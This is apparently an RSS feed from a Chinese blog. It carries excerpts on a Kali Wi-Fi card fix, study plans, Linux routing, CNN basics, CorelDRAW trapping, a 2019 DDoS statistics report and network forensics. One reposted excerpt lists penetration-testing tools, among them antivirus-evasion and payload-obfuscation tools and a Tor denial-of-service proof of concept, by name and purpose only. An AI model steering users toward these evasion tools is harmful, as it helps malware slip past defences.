<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Life on 暗网探秘</title>
    <link>https://anwangtanmi.github.io/categories/life/</link>
    <description>Recent content in Life on 暗网探秘</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>zh-CN</language>
    <lastBuildDate>Sat, 14 Sep 2019 11:22:48 +0800</lastBuildDate>
    <atom:link href="https://anwangtanmi.github.io/categories/life/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>linux5.2.0内核kali2-amd64升级后无法使用网卡解决办法</title>
      <link>https://anwangtanmi.github.io/posts/656432ff58b18449ccdd6186efb0772e/</link>
      <pubDate>Sat, 14 Sep 2019 11:22:48 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/656432ff58b18449ccdd6186efb0772e/</guid>
      <description>我原来使用的是hp的暗影精灵，升级5.2.0-kali2-amd64后，原来的RTL8822be网卡无法使用，经过几天努力安装驱动后，始终无法 显示可用网络。我不想使用外置网卡，无奈之下就在tao宝上购买了一块较新的网卡。&#xA;于是就买了一张&#xA;Intel AX200这张网卡，&#xA;买回来以后先在win10上面测试，（由于hp笔记本兼容性不好），于是去intel官方网站安装完驱动后，完美正常运行。&#xA;打开kali后发现一样完美运行，下面是查询后的截图&#xA;附一张网卡照片。&#xA;注意：最后提醒一点，运行kali linux内核4.90+版本后网卡无法使用。</description>
    </item>
    <item>
      <title>大二上学期总结</title>
      <link>https://anwangtanmi.github.io/posts/583fc14ddf0fdfedafbb2bc15d84564e/</link>
      <pubDate>Tue, 27 Aug 2019 12:58:48 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/583fc14ddf0fdfedafbb2bc15d84564e/</guid>
      <description>学习大佬做法，也来搞⛏搞一个每周更新的博客。&#xA;上学期总计划:&#xA;1、学完javaEE和ssm框架和springboot&#xA;2、建立github网站 (下学期再搞，主要想用springboot实现)&#xA;3、加入软创工作室 (失败，主要还是太菜~)&#xA;4、学习钢琴 (太贵了555555)&#xA;5、上半学期看完大一买的书。&#xA;6、考过英语6级。&#xA;7、听电科的《计算机组成原理》&#xA;8、多做项目(目标:8个)&#xA;9、开始试做leetcode的题目&#xA;10、找个女朋友？（还是技术和动漫好~）&#xA;11、学习数学建模&#xA;日常任务：&#xA;1、一周至少看一本书&#xA;2、每天背单词150个&#xA;3、每周跑10公里的步&#xA;4、每周写一篇好的博客（第八周新增）&#xA;//========================================================================&#xA;第一周:&#xA;1、复习MYSQL和前端的代码。(未完成)&#xA;2、复习servlet和jsp的内容。（完成）&#xA;3、将JSP的项目完成。（完成）&#xA;4、将《暗时间》看完。(完成)&#xA;5、继续学习git (未完成)&#xA;6、学完MVC设计思想 (完成)&#xA;7、写2篇2000字的报告和1篇1000字的金工实习 (完成)&#xA;总结：单词背得少，反思。。。。&#xA;第二周:&#xA;1、学习打理头发知识 (完成)&#xA;2、看完前后端分离的视频 (完成)&#xA;3、给项目写接口(放弃)&#xA;4、复习MYSQL和前端的代码(完成)&#xA;5、继续学习git (完成)&#xA;6、将《刻意练习》看完。(未完成)&#xA;总结：单词没背，还有没看书，没写字。额，还是要加油。。。&#xA;第三周：&#xA;1、看书《罪与罚》(未完成)&#xA;2、学完javaEE的大部分内容 (完成)&#xA;3、写接口。(未完成)&#xA;4、学习IDEA使用 (未完成)&#xA;总结:这周太废了，迷上了小说，很差劲，开始学习mybatis，下周要开始早起了。&#xA;第四周：&#xA;1、看完之前的书。 (完成)&#xA;2、学完Mybatis(完成)&#xA;3、解决VMware的bug(完成)&#xA;4、开始学习Spring(完成)&#xA;5、继续学习使用IDEA(完成)&#xA;目标：11:40前睡觉，7点起床，写字，背单词，看名著。&#xA;总结：mybatis大致是学完了，但是源码部分绕得有点晕，还得继续学习，spring先放一边吧。&#xA;睡觉和早起和读书 未完成，可恶呀！！英语单词有开始背了。最近生病了，有点虚。&#xA;mybatis估计还得学个三天。。准备换种学习方法。&#xA;第五周：&#xA;1、看书《罪与罚》&#xA;2、治病 (完成)</description>
    </item>
    <item>
      <title>【渗透测试工具集】令人敬畏的渗透测试工具等汇总杂烩</title>
      <link>https://anwangtanmi.github.io/posts/2c5b747cee254825c7852c40e48a431d/</link>
      <pubDate>Wed, 07 Aug 2019 23:36:13 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/2c5b747cee254825c7852c40e48a431d/</guid>
      <description>原文链接：&#xA;https://blog.csdn.net/Fly_hps/article/details/89306104 刚刚在网上浏览找到的，发现一篇不错的渗透测试工具的文章，就转发来大家一起看看&#xA;匿名工具 I2P – 隐形互联网项目。 Nipe – 用于将所有流量从计算机重定向到Tor网络的脚本。 OnionScan – 通过查找Tor隐藏服务运营商引入的操作安全问题来调查Dark Web的工具。 Tor – 免费软件和洋葱路由覆盖网络，可帮助您防御流量分析。 每个浏览器都知道的内容 – 全面的检测页面，用于测试您自己的Web浏览器的隐私和身份泄漏配置。 dos-over-tor – Tor压力测试工具的概念验证拒绝服务。 kalitorify – 通过Tor为Kali Linux OS提供透明代理。 防病毒逃生工具 AntiVirus Evasion Tool（AVET） – 包含针对Windows机器的可执行文件的后处理漏洞，以避免被防病毒软件识别。 Hyperion – 用于32位可移植可执行文件的运行时加密程序（“PE .exes”）。 Shellter – 动态shellcode注入工具，以及有史以来第一个真正动态的PE infector。 UniByAv – 简单的混淆器，它使用原始shellcode并使用强制执行的32位XOR密钥生成反病毒友好的可执行文件。 面纱 – 生成绕过常见防病毒解决方案的metasploit有效负载。 peCloak.py – 自动隐藏来自防病毒（AV）检测的恶意Windows可执行文件的过程。 peCloakCapstone – peCloak.py自动恶意软件防病毒逃避工具的多平台分支。 shellsploit – 生成自定义shellcode，后门，注入器，可选择通过编码器对每个字节进行混淆。 图书 另见DEF CON建议阅读。&#xA;防御性编程书籍 Web开发人员的整体信息 – （分册0） Web开发人员的整体信息 – （分册1） 黑客手册系列丛书 Joshua J.</description>
    </item>
    <item>
      <title>开发日记-20190806 关键词 读书笔记《Linux 系统管理技术手册（第二版）》DAY 20</title>
      <link>https://anwangtanmi.github.io/posts/fa4952a78654ffd1f0cb1336de631a8a/</link>
      <pubDate>Tue, 06 Aug 2019 22:26:05 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/fa4952a78654ffd1f0cb1336de631a8a/</guid>
      <description>12.4.4 CIDR:无类域间路由&#xA;CIDR是在RFC1519(1993年9月)里定义的,它废除了以前由一个IP地址的网络部分所确定的分类系统.CIDR与子网划分相似,是子网划分方法的直接扩展.CIDR要依赖于一个明确的网络掩码来确定地址的网络部分和主机部分之间的边界.但与划分子网不同的是,处于路由选择的目的,网络部分比地址暗示的分类所暗指的网络部分小.使用较短的网络掩码可以聚集若干个网络.因此,CIDR有时叫做超网(supernetting).&#xA;使用CIDR就可以将若干C类网络分配一个网点,而不要求Internet对各个网络具有单独的路由表项.还可以为这个网店分配某个A类或B类地址的一个子空间.例如,加入某个网点已获得8个C类地址,从192.144.0.0到192.144.7.0(CIDR的记法为192.144.0.0/21).这个网点在内部可以将它们用作:&#xA;一个长度为/21的网络,2046台主机,网络掩码为255.255.248.0; 8个长度为/24的网络,各自具有254台主机,网络掩码为255.255.255.0; 16个长度为/25的网络,各自具有126台主机,网络掩码为255.255.255.128; 32个长度为/26的网络,各自具有62台主机,网络掩码为255.255.255.192等; 12.5 路由选择&#xA;路由选择(routing,也叫做路由,选路)是引导一个包通过网络迷宫,从它的源地址到达目的地址的过程.在TCP/IP系统中,这类似于在一个陌生的国家里问路.您问的第一个人可能把您指引到正确的城市.当离目的地比较近的时候,下一个人就能告诉您怎么样到达正确的街道.最后,据目的地很近了,这时就有人可以告诉您您想找的那幢大楼了.&#xA;TCP/IP路由信息采用了规则(“路由[route]”)的形式,如”为了达到网络A,要经过计算机C发送包”.同事还存在一条默认路由,它告诉您应该怎么样处理要送往没有明确路由的网络的包.&#xA;路由信息保存在内核的一张表里,表中的每一项都有一些参数,其中包括每个列出的网络的网络掩码(这个参数以前是可选的,但是现在如果默认的网络掩码不正确,就必须给出).为了把一个包路由至特定的地址,内核会选择与之匹配的路由中最确切的一条(即带有最长网络掩码的路由).如果内核没有找到适合的路由,有没有默认路由的话,那么它就向发送方返回一个”网络不可达(network unreachable)”的ICMP错误消息.&#xA;“路由”一词通常表示两种截然不同的意思:&#xA;在路由表里寻找一个网络地址,以便将一个包转发到它的目的地. 首先建立路由表. 12.5.1 路由表&#xA;可以用netstat -r命令检查一台计算机上的路由表.用命令netstat -rn避免做DNS查询,并把素有的信息以数字地址形式输出.&#xA;我们将从19.4节开始详细地讨论netstat命令,但是这里给出的剪短例子可以让您对路由有一个比较形象的概念.这台主机有两个网络接口:在132.236.227.0/24网络上的132.236.227.93(eth0),和在132.236.212.0/26网络上的132.236.212.1(eth1):&#xA;Destination域通常就是一个网络地址,Gateway网关必须是一个主机地址.&#xA;路由表可以静态或者动态地配置,也可以结合这两种方法进行配置.静态路由是用route命令明确地输入的路由.只要系统还在运行,静态路由就应该在路由表里,他们通常是通过一个系统启动脚本在系统启动脚本在系统引导时设置的.&#xA;最后一条路由也是在系统引导时加入的.它配置了一个名为loopback(环回接口)不让主机发送给自己的包跑到网络上去,而是在内核中直接从网络输出队列传输到网路输入队列&#xA;在一个稳定的本地网络里,静态路由是一种高效的解决方案.它易于管理,而且很可靠.但是,它要求系统管理员确切地知道系统引导时网络的拓扑结构,而且这个拓扑结构不会经常改变.</description>
    </item>
    <item>
      <title>吴恩达神经网络和深度学习-学习笔记-29-卷积的基础知识</title>
      <link>https://anwangtanmi.github.io/posts/29b4808728e56e9cbd29ded23fce4acc/</link>
      <pubDate>Tue, 23 Jul 2019 10:30:29 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/29b4808728e56e9cbd29ded23fce4acc/</guid>
      <description>卷积和边缘检测 垂直边缘检测器的卷积过程 最简单的垂直边缘检测 过滤器fliter在原图像上滚动。&#xA;size_输出维度 = size_输入维度 – size_过滤器维度 + 1&#xA;在过小的图片上检测时，可能会出现边缘过大的问题。但在大图片上，其可以很好地检测边缘。&#xA;区分正边和负边的边缘检测 上面是由明向暗，下面是由暗到明。&#xA;水平边缘检测 其他边缘检测的滤波器 Sobel滤波器增加了中间一行元素的权重，这使得结果的鲁棒性更高一些。&#xA;Scharr滤波器实际上是一种垂直边缘检测，翻转90°就是水平边缘检测。&#xA;随着深度学习的发展，我们学习到，当我们真正想去检测出复杂图像的边缘，我们不一定要去使用那些研究者所使用的9个数值。&#xA;我们可以把这9个数字当作9个参数，在之后通过反向传播算法去理解这9个参数。&#xA;相比于单纯的垂直和水平检测，这种方法可以找到任何角度的边缘。神经网络可以自动去学习一些低级的特征（比如边缘）。&#xA;反向传播可以让神经网络学习任何它所需的3×3滤波器，并在整幅图片上去应用它。&#xA;将这9个数都作为参数的思想，已经称为计算机视觉中最有效的思想之一。&#xA;Padding 不加Padding直接卷积的缺点 不加Padding的两个缺点：&#xA;每次做卷积操作图像都会缩小。 丢掉了图像的边缘位置的许多信息&#xA;（如果你注意角落边的像素，这个像素点只被一个输出所触碰或者使用，而中间的像素点就会被许多3×3区域使用）&#xA;合理设置Padding的值和过滤器的size，可以使得输出维度等同于输入维度。这样就解决了图像减小的缺点。&#xA;而左上角涂绿的格子，影响了输出的4个格子。&#xA;Padding的时候，习惯上用0来填充。 Padding多少个像素 通常有两个选择：&#xA;Valid卷积：不填充（no Padding） Same卷积：使输入输出维度一致（Pad so that output size is the same as the input size）。&#xA;习惯上，过滤器的size一般都是奇数的。&#xA;原因大概有两个： 采用偶数，就只能使用不对称填充。 奇数维度的过滤器有中心点，有时在计算机视觉里，如果有一个中心像素点会更方便，便于之处滤波器的位置。 卷积步长 卷积中的步长是另一个构建卷积神经网络的基本操作。&#xA;[Z]为向下取整，也叫做进行板除（the floor of Z）。&#xA;3×3的过滤器必须完全处于图像中或者填充后的图像区域内，才输出相应的结果&#xA;卷积为何有效 单个三维过滤器的卷积 上面讨论的都是通道数为1的图像，而面对通道数大于1的图像，情况也会有所不同。&#xA;以3通道的RGB图像为例，相比于单通道的图像，数据相当于多了一个维度（从6×6变为6×6×3）。同样，卷积过程中用到的过滤器的通道数要与输入图像一致（对应PyTorch库中Conv2d()的in_channel参数）。&#xA;但是最后输出的矩阵的维度仍为1。&#xA;具体的卷积过程如下：&#xA;过滤器与输入数据立方对应位置的数相乘，再求和，就得到了输出矩阵相应位置的一个数。&#xA;上面这张图告诉我们两个事情：&#xA;我们可以关注某一个特定的通道，对应的操作就是单独对相应通道的滤波器进行设置。 三维的输入数据立方 卷积 三维同深度过滤器，得到的是二维的输出矩阵。 多个三维过滤器的卷积 这样做的重要性在于：</description>
    </item>
    <item>
      <title>如何使用 CorelDRAW 为服饰丝网印刷进行颜色补漏？</title>
      <link>https://anwangtanmi.github.io/posts/2833c705d159ed28af6849f1a0d39d14/</link>
      <pubDate>Sat, 22 Jun 2019 15:29:51 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/2833c705d159ed28af6849f1a0d39d14/</guid>
      <description>颜色补漏是服装装饰（丝网印刷）行业以及任何重要印刷行业中的主要方面。大部分为丝网印刷工提供设计的艺术家预计会使用瓶颈和展开（补漏）提供精准分色。颜色补漏是展开、叠印或底切对象，以防止印刷不准确，例如重合问题。纺织品丝网印刷行业中最普遍存在的其中一个问题是重合质量不佳，其中可以看到不应出现的白色基底（适合暗色 T 恤印刷的白色印刷机）。如何如何使用 CorelDRAW 为服饰丝网印刷进行颜色补漏？具体的CorelDRAW 使用教程一起来看看吧！&#xA;了解颜色补漏和多种使用方法将确保您的印刷正确无误以及设置简便，并在很多情况下将加速整个生产过程。&#xA;补漏和重合在 CorelDRAW 中的设置方法多种多样：直接在每个项目的文档中、在文档叠印下拉列表的分色选项卡中或通过使用印刷对话框中的自动补漏选项。有关颜色补漏的更多信息，请参阅 CorelDRAW 用户指南。&#xA;补漏的基本方法是叠印、瓶颈和展开。注意：展开在服装装饰行业中通常被描述为补漏。&#xA;叠印是指，一个对象或颜色直接在另一个对象或颜色上印刷。&#xA;展开（补漏）是指，细线（轮廓）添加到对象边缘，其中对象会从底部对象中切除。展开会叠印底部对象。基本上，轮廓会添加到顶部对象，以将其放大。&#xA;瓶颈是指为底部对象指定的小轮廓，这样顶部对象才可以叠印底部对象或颜色。基本上，会为底部对象指定轮廓，这样才会印刷比原始对象更大的对象。设计时在对象上手动设置补漏，可为丝网印刷工确保准确分色。您有时可能会忘记在设计时添加补漏，而全局瓶颈和展开大小可能无效，因为设计中的大小元素各不相同。在手动分色和补漏时需要。小型衬线可能不允许 0.5 的瓶颈，而设计中的其他元素会保证 0.75 的瓶颈或补漏。&#xA;图 3 显示接合元素的侧视图，其中颜色或对象在彼此的顶部上完全相同。展开或补漏显示顶部颜色的轮廓会使顶部颜色稍微深于底部或下层颜色，而瓶颈会使下层颜色的白色轮廓稍微浅于顶部颜色或对象。以下步骤将向您显示如何将瓶颈和补漏应用到 CorelDRAW 中的手动分色。在此设计中，我们会将瓶颈和补漏添加到将印刷在暗色 T 恤上的示例专色设计，而需要白色基底（白色印刷机），但白色不应显示在印刷品上。步骤 1：创建您的设计并调整其大小，以最终确定印刷大小。&#xA;步骤 2：添加重合标记和标签（墨色）&#xA;步骤 3：为每个待印刷的颜色重复您的设计，或复制粘贴到每种待印刷颜色的新页面。&#xA;步骤 4：如果在设计中使用中间色，将每个调色板转换为黑白色或灰度图像。&#xA;步骤 5：&#xA;将白色轮廓应用到白色板上的所有对象（白色印刷机或分色）。这将使白色成为浅白色，这样顶部颜色可以覆盖所有白色基底。这也称为瓶颈。&#xA;将黑色基底应用到顶部颜色（色板或分色）&#xA;在某些情况下，您仅可以应用一个操作或另一个操作，例如瓶颈或补漏，这是因为对象属性或对象在设计中叠加的方式。实践经验、印刷设备和所用油墨也将在表示使用何种方法或是否能够确保使用瓶颈和补漏中扮演重要角色。基本上，一些研发、试验和错误将使任何人成为出色的分色师。&#xA;在下方图表中，表示实际色板颜色的轮廓。对于手动分色而言，您可能需要为补漏或瓶颈使用黑色或白色轮廓。步骤 6：印刷分色胶片了解最终印刷效果是否如预期，以及重合时无任何问题。</description>
    </item>
    <item>
      <title>VM虚拟机Ubuntu系统偶尔黑屏无响应的解决</title>
      <link>https://anwangtanmi.github.io/posts/cf351c1890c2d7b3b6a5835b6ba24e01/</link>
      <pubDate>Fri, 21 Jun 2019 20:45:16 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/cf351c1890c2d7b3b6a5835b6ba24e01/</guid>
      <description>在网上找到一种解决方法，实测可以解决问题：以管理员身份运行cmd控制台程序，输入命令netsh winsock reset，作用是重置winsock网络规范，然后重启系统，在打开VMware就可以了。&#xA;为什么重置winsock就可以了没有深究·········</description>
    </item>
    <item>
      <title>【青松资讯】2019年第一季度DDoS攻击报告</title>
      <link>https://anwangtanmi.github.io/posts/fec8a1e7b175d9ee6e8ac3e6e294e125/</link>
      <pubDate>Fri, 31 May 2019 18:43:32 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/fec8a1e7b175d9ee6e8ac3e6e294e125/</guid>
      <description>年初，DDoS攻击策划者的工具库中出现了各种各样的新工具。例如，在2月初，由Qbot、Mirai和其他公开可用的恶意软件组成的新僵尸网络Cayosin进入了人们的视野。安全专家更感兴趣的不是它的镶嵌结构和频繁更新的漏洞集，而是它的广告——作为DDoS服务，广告位不是在暗网上，而是摆上了YouTube。更重要的是，它将在Instagram上出售，僵尸网络显然在充分利用社交媒体提供的机会。通过追踪网络罪犯的账户，研究人员还发现了其他恶意软件和僵尸网络，包括已经发现的Yowai。&#xA;3月中旬又发现了一个新版本的Mirai，意在攻击商业设备。该恶意软件现在不仅能“僵尸化”接入点、路由器和网络摄像头，还能“僵尸化”无线演示系统和数字标牌系统。&#xA;尽管如此，使用僵尸网络进行高调攻击的数量并没有那么大。年初，美国UAlbany大学受到攻击：在2月5日至3月1日期间，该校遭受了17次攻击，服务器宕机至少5分钟。学生和教职工数据库没有受到影响，但一些服务无法提供；UAlbany的IT安全主管认为，这所大学是被特别盯上的。&#xA;二月初，菲律宾全国记者联盟的网站也受到攻击。由于一系列强大的攻击，该网站被关闭了数小时，最高流量为468 GB/s。该网站认为自己是政治压力的受害者。&#xA;同样在3月中旬，Facebook和Instagram用户无法登录其账户，导致其服务出现严重问题。安全观察员认为该事件与DDoS有关。然而，Facebook本身拒绝这种说法。&#xA;在缺乏关于严重DDoS攻击的新闻的同时，有关警方对攻击组织者采取重大行动的报道数量也在增加，同时还出现了逮捕和指控事件。&#xA;然而，尽管有执法部门的努力，DDoS攻击仍然对企业构成巨大威胁。诺斯达国际安全理事会对200名大型公司的高级技术人员进行的调查显示，现如今，大型公司认为DDoS攻击是一个严重的问题：52%的安全服务人员已经遇到过这种攻击，75%的人对此表示担忧。&#xA;季度的趋势&#xA;根据数据显示，长时间、更难组织的攻击在定性和定量上的比例仍在增长。我们认为这种趋势将在第二季度持续下去。&#xA;本报告包含2019年第一季度DDoS情报统计。&#xA;季度总结&#xA;就袭击的地理分布而言，中国仍然处于领先地位。&#xA;攻击目标的地理分布大致为：前三名分别是中国(59.85%)、美国(21.28%)和香港地区(4.21%)。&#xA;DDoS攻击在3月下旬达到高峰；最平静的时期是一月份。&#xA;对于DDoS攻击来说，一周中最危险的一天是周六，而周日仍然是最平静的。&#xA;SYN Flood的比例上升到84%，UDP Flood和TCP Flood的比例下降，HTTP和ICMP攻击的比例分别上升到3.3%和0.6%。&#xA;Linux僵尸网络的份额略有下降，但仍然占主导地位(95.71%)。&#xA;大多数僵尸网络C&amp;amp;C服务器仍然位于美国(34.10%)，荷兰(12.72%)位居第二，俄罗斯(10.40%)位居第三。值得注意的是，曾经长期领先的韩国重新回到了前十名，尽管排在第十名(2.31%)。&#xA;攻击地理&#xA;中国仍然是发起袭击次数最多的国家。在经历了前几个季度的下跌之后，它甚至回到了之前的水平：份额从50.43%上升到了67.89%。排在第二位的是美国，尽管其份额从24.90%下降到了17.17%。香港从第七位上升至第三位，所占份额从1.84%升至4.81%。&#xA;有趣的是，除中国内地和香港外，其他所有国家的排名都下跌了。&#xA;2018Q4及2019Q1按国家划分的DDoS攻击分布&#xA;攻击目标的地理分布结果符合发起攻击本身的地理分布趋势：中国内地又一次在第一位置（从43.26%升到59.85%），美国在第二（从29.14%降到21.28%）和香港地区在第三（从1.76%升到4.21%）。&#xA;2018Q4和2019Q1按国家划分的DDoS攻击目标分布&#xA;DDoS攻击的持续时间和类型&#xA;在第一季度，持续攻击的比例几乎翻了一番，从0.11%上升到0.21%。然而，与2018年第四季度持续近14天(329H)不同，本季度持续时间最长的攻击仅略多于12天(289H)。&#xA;最重要的是，持续时间超过5小时的攻击所占比例显著增加；而在2018年底，这一比例为16.66%，目前为21.34%。从图中可以看出，如果将这一段分割成更小的片段，大部分长时间攻击的类别都有上升的趋势，而只有持续100-139小时的攻击比例略有下降(从0.14%下降到0.11%)。因此，短期攻击的比例下降了近5个百分点，至78.66%。&#xA;2018Q4和2019Q1 DDoS攻击的持续时间(小时)分布&#xA;和往年一样，SYN Flood在第一季度垃圾邮件流量中占据了最大份额。与2018年第四季度相比，其份额更大，攀升至84.1%。当然，如此大幅度的上涨对其他类型的占比也产生了影响。&#xA;举个例子，UDP Flood虽然排名第二，但第一季度的份额仅为8.9%（低于31.1%）。排在第三位的TCP Flood的份额也有所下降（从8.4%降至3.1%），仅排在第四位，仅次于HTTP Flood（增长了1.1个百分点，至3.3%）。尽管ICMP的份额从0.1%上升到0.6%，但仍排在最后。&#xA;2019年Q1 DDoS攻击的类型分布&#xA;Linux僵尸网络的数量仍然远远超过Windows僵尸网络，尽管在2019年第一季度，这一差距略有缩小：Linux僵尸网络现在占总数的95.71%，而Windows僵尸网络的份额分别上升了约1.5个百分点，达到4.29%。然而，这并不是因为Windows设备变得越来越受欢迎，而是因为Mirai机器人及其克隆产品Darkai的C&amp;amp;C服务器数量正在下降。相应地，这些机器人的攻击次数分别减少了3倍和7倍。&#xA;2018Q4和2019Q1 Windows/Linux僵尸网络攻击的比率&#xA;僵尸网络地理分布&#xA;在其国土上僵尸网络数量最多的国家仍然是美国(34.10%),荷兰从2018年第四季度的第三名升至第二名(12.72%),这次排名第三的是俄罗斯(10.40%)，从第七名一路攀升。中国(7.51%)的排名从垫底升至第四。&#xA;2019Q1僵尸网络C&amp;amp;C服务器的国家分布&#xA;中国境内的数据&#xA;1.控制端资源分析&#xA;根据CNCERT抽样监测数据，2019年第一季度，平均每月利用肉鸡发起DDoS攻击的控制端有230个，平均29个控制端位于我国境内，201个控制端位于境外。&#xA;位于境外的控制端主要分布在美国、法国和中国香港。&#xA;位于境内的控制端按省份统计，江苏省占的比例最大，占比20%以上，其次是广东省；按运营商统计，电信占的比例最大，占66.5%，联通和移动随后。&#xA;2.肉鸡资源分析&#xA;根据CNCERT抽样监测数据，2019年第一季度，平均每月有195694个肉鸡地址参与真实地址攻击（包含真实地址攻击与其它攻击的混合攻击）。&#xA;这些肉鸡资源按省份统计，广东省、江苏省、浙江省占的比例最大，其次是福建省和河南省；按运营商统计，电信占的比例最大，为74.5%，联通和移动随后。&#xA;3.反射攻击资源分析&#xA;（1）Memcached反射服务器资源&#xA;本季度境内反射服务器数量按省份统计，山东省的比例最大，其次是广东省、河南省和浙江省；按归属运营商或云服务商统计，电信占的比例最大，占31.3%，但与移动和联通相比差距不大。值得注意的是，阿里云平均占比7.5%。&#xA;（2）NTP反射服务器资源&#xA;本季度被利用发起NTP反射攻击的境内反射服务器数量按省份统计，山东省占的比例最大，其次是河北省、湖北省和河南省；按归属运营商统计，移动和联通占的比例最大，达到70%以上，电信占比较小。&#xA;（3）SSDP反射服务器资源&#xA;本季度被利用发起SSDP反射攻击的境内反射服务器数量按省份统计，辽宁省占的比例最大，占21.4%，其次是浙江省、吉林省和广东省；按归属运营商统计，联通占的比例最大，占62.0%，电信占比36.3%，移动占比1.3%。&#xA;结论&#xA;在前三个季度，我们看到几个排名前十的国家出现了一些意想不到的新情况——这些国家并没有成为DDoS威胁的主要来源。但2019年第一季度并没有什么特别的惊喜，除了沙特阿拉伯、荷兰和罗马尼亚等国保持着高水平的DDoS活动;换句话说，他们出现在前10名并不能归因于随机偏差。与此同时，韩国的DDoS活动策划者似乎潜伏了下来，并未出现高调活动。我们有可能正在目睹一个新的僵尸网络在各个国家“定居”下来。&#xA;同样值得注意的是，Mirai克隆体之一Darkai的僵尸网络活动显著下降。在它的帮助下，攻击次数减少了7倍。源于各国对僵尸网络的严厉打击，Mirai本身也受到重创，活动减少了三倍。因此，这个因素在某种程度上解释了DDoS攻击数量和持续时间的下降。&#xA;*参考数据来源：Kaspersky Lab、国家互联网应急中心CNCERT，青松编译，转载请注明来自Qssec.COM。&#xA;— E N D　—</description>
    </item>
    <item>
      <title>如何利用网络取证之流量分析的方式，还原恶意攻击入侵的全过程？</title>
      <link>https://anwangtanmi.github.io/posts/beddc36eb0807a78e3f898c9852b64b7/</link>
      <pubDate>Wed, 15 May 2019 14:55:17 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/beddc36eb0807a78e3f898c9852b64b7/</guid>
      <description>满屏闪烁的代码&#xA;帽兜中忽明忽暗的脸&#xA;谈笑间轻轻按下的回车键&#xA;一次黑客攻击悄无声息的发生了&#xA;……&#xA;随着黑客技术的不断发展和普及，黑客攻击变得越来越普遍，企业和组织面对的网络攻击风险与日俱增，防御措施需要更加敏感和先进。&#xA;通常，黑客攻击都是通过网络发起的。了解网络取证可以帮助我们及时发现网络中黑客攻击的行为，进而保护整个网络免受黑客的攻击。今天我们主要分享网络取证过程中非常重要的一项——即流量分析，并模拟利用流量分析的方式还原恶意攻击入侵的全过程，希望带给您一定参考价值！&#xA;我们将从以下几方面展开相关分享。&#xA;一、什么是网络取证&#xA;从本质上讲，网络取证是数字取证的一个分支，网络取证是对网络数据包的捕获、记录和分析，以确定网络攻击的来源。&#xA;其主要目标是收集证据，并试图分析从不同站点和不同网络设备（如防火墙和IDS）收集的网络流量数据。&#xA;此外，网络取证也是检测入侵模式的过程，它可以在网络上监控以检测攻击并分析攻击者的性质，侧重于攻击者活动。&#xA;二、 网络取证的步骤&#xA;网络取证主要包括以下步骤↓↓↓&#xA;识别&#xA;根据网络指标识别和确定事件。&#xA;保存&#xA;存在的问题及原因。&#xA;搜集&#xA;使用标准化方法和程序记录物理场景并复制数字证据。&#xA;检查&#xA;深入系统搜索与网络攻击有关的证据。&#xA;分析&#xA;确定重要性，多维度分析网络流量数据包，并根据发现的证据得出结论。&#xA;展示&#xA;总结并提供已得出结论的解释。&#xA;事件&#xA;响应&#xA;根据收集的信息启动对检测到的攻击或入侵的响应，以验证和评估事件。&#xA;与其它数据取证一样，网络取证中的挑战是数据流量的嗅探、数据关联、攻击来源的确定。由于这些问题，网络取证的主要任务是分析捕获的网络数据包，也就是流量分析。&#xA;三、流量分析&#xA;A.什么是流量分析？&#xA;网络流量是指能够连接网络的设备在网络上所产生的数据流量。&#xA;不同的应用层，流量分析起到的作用不同。&#xA;1.用户层：运营商通过分析用户网络流量，来计算网络消费。&#xA;2.管理层：分析网络流量可以帮助政府、企业了解流量使用情况，通过添加网络防火墙等控制网络流量来减少资源损失。&#xA;3.网站层：了解网站访客的数据，如ip地址、浏览器信息等；统计网站在线人数，了解用户所访问网站页面；通过分析出异常可以帮助网站管理员知道是否有滥用现象；可以了解网站使用情况，提前应对网站服务器系统的负载问题；了解网站对用户是否有足够的吸引能力。&#xA;4.综合层：评价一个网站的权重；统计大多数用户上网习惯，从而进行有方向性的规划以更适应用户需求。&#xA;B.如何进行流量分析？&#xA;网络流量分析主要方法:&#xA;1.软硬件流量统计分析&#xA;基于软件通过修改主机网络流入接口，使其有捕获数据包功能，硬件主要有用于收藏和分析流量数据，常见的软件数据包捕获工具pCap（packet capture），硬件有流量镜像的方式。&#xA;2.网络流量粒度分析&#xA;在bit级上关注网络流量的数据特征，如网络线路传输速率，吞吐量变化等；在分组级主要关注ip分组达到的过程，延迟，丢包率；在流级的划分主要依据地址和应用协议，关注于流的到达过程、到达间隔及其局部特征。&#xA;网络流量分析常用技术&#xA;RMON技术&#xA;RMON(远程监控)是由IETF定义的一种远程监控标准，RMON是对SNMP标准的扩展，它定义了标准功能以及远程监控和网管站之间的接口，实现对一个网段或整个网络的数据流量进行监控。&#xA;SNMP技术&#xA;此技术是基于RMON和RMON II，仅能对网络设备端口的整体流量进行分析，能获取设备端口出入历史或实时的流量统计信息、不能深入分析包类型、流向信息，具有实现简单，标准统一，接口开放的特点。&#xA;实时抓包分析&#xA;提供纤细的从物理层到应用层的数据分析。但该方法主要侧重于协议分析，而非用户流量访问统计和趋势分析，仅能在短时间内对流经接口的数据包进行分析，无法满足大流量、长期的抓包和趋势分析的要求。&#xA;FLOW技术&#xA;当前主流技术主要有两种，sFlow和netFlow。&#xA;sFlow是由InMon、HP和Foundry 